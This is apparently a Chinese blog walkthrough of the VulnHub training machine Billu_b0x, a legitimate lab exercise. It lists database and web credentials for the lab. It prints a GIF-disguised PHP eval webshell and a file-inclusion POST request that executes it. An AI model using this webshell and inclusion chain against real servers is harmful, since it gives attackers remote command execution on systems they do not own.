vulhub靶机Billu_b0x

1.下载靶机

https://download.vulnhub.com/billu/Billu\\_b0x.zip

2.信息收集

kali和靶机ip

访问靶机ip

扫描敏感目录

3.漏洞挖掘

一一访问每个文件

发现add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。test文件下貌似可以进行传参

file传参

get传参不可以,用bp抓包转换为post传参

查看c.php源码

这是数据库连接文件,发现mysql连接用户名密码:

用户名:billu

密码:b0x_billu

数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin成功

ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。

登录web界面

上传图片,查看图片,存在目录浏览

webshell连接

上传图片马

GIF89a
<?php @eval($_POST['cmd']);?>

然后使用POST传参

http://192.168.126.170/panel.php

load=uploaded_images/2.png&continue=continue

蚁剑连接

相关推荐
mCell3 小时前
从删库到跑路?这50个Linux命令能保你职业生涯
linux·windows·macos
杰克逊的日记3 小时前
GPU运维常见问题处理
linux·运维·gpu
誰能久伴不乏4 小时前
Linux系统调用概述与实现:深入浅出的解析
linux·运维·服务器
程序员学习随笔4 小时前
Linux进程深度解析(2):fork/exec写时拷贝性能优化与exit资源回收机制(进程创建和销毁)
linux·运维·服务器
mmoyula4 小时前
【RK3568 PWM 子系统(SG90)驱动开发详解】
android·linux·驱动开发
-SGlow-4 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
代码改变世界ctw5 小时前
Linux内核设计与实现 - 第14章 块I/O层
linux·运维·服务器
终焉暴龙王6 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
van叶~7 小时前
Linux网络-------1.socket编程基础---(TCP-socket)
linux·网络·tcp/ip
风吹落叶花飘荡7 小时前
Ubuntu系统 系统盘和数据盘扩容具体操作
linux·运维·ubuntu